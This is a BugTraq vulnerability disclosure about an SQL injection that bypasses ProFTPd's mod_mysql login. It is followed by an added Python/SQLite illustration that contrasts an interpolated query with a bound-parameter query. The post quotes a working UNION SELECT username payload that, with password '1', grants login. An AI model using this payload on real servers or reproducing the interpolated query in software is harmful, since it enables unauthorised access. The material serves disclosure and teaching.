BugTraq
Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Feb 10 2009 07:49PM
gat3way gat3way eu
Hello,

Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you log in with a username like:

USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --

and a password of "1" (without quotes).

which leads to a successful login. Differ...
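
A simplified model of why the password "1" matches, written as an added example; it is not part of the original post and is not ProFTPD's code. It shows the row that the injected UNION returns next to the same lookup done with a bound parameter. The table layout, the six-column query shape, the plaintext password comparison and the naive string interpolation are assumptions made for illustration, and SQLite stands in for MySQL.

```python
import sqlite3

# Username string quoted from the post; everything else here is constructed.
PAYLOAD = "%') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --"

# Assumed lookup shape: six columns, user name compared inside ('...').
COLS = "userid, passwd, uid, gid, homedir, shell"


def make_db():
    """Build an in-memory users table with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (userid TEXT, passwd TEXT, uid INTEGER,"
        " gid INTEGER, homedir TEXT, shell TEXT)"
    )
    db.execute(
        "INSERT INTO users VALUES"
        " ('alice', 's3cret', 1001, 1001, '/home/alice', '/bin/sh')"
    )
    return db


def lookup_interpolated(db, user):
    """Weak form: the user name is pasted into the SQL text."""
    sql = f"SELECT {COLS} FROM users WHERE (userid='{user}') LIMIT 1"
    return db.execute(sql).fetchone()


def lookup_bound(db, user):
    """Hardened form: the user name travels as a bound parameter."""
    sql = f"SELECT {COLS} FROM users WHERE (userid=?) LIMIT 1"
    return db.execute(sql, (user,)).fetchone()


def login(lookup, db, user, password):
    """Plaintext comparison against the passwd column of the returned row."""
    row = lookup(db, user)
    return row is not None and str(row[1]) == password


if __name__ == "__main__":
    db = make_db()
    print("interpolated:", lookup_interpolated(db, PAYLOAD))
    print("bound:       ", lookup_bound(db, PAYLOAD))
    print("login, interpolated:", login(lookup_interpolated, db, PAYLOAD, "1"))
    print("login, bound:       ", login(lookup_bound, db, PAYLOAD, "1"))
```

In the interpolated form the first SELECT is forced empty by `1=2`, so the only row comes from the UNION and carries the literal `1` in the password column alongside a real account's uid, gid, homedir and shell.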

Copyright 2010, SecurityFocus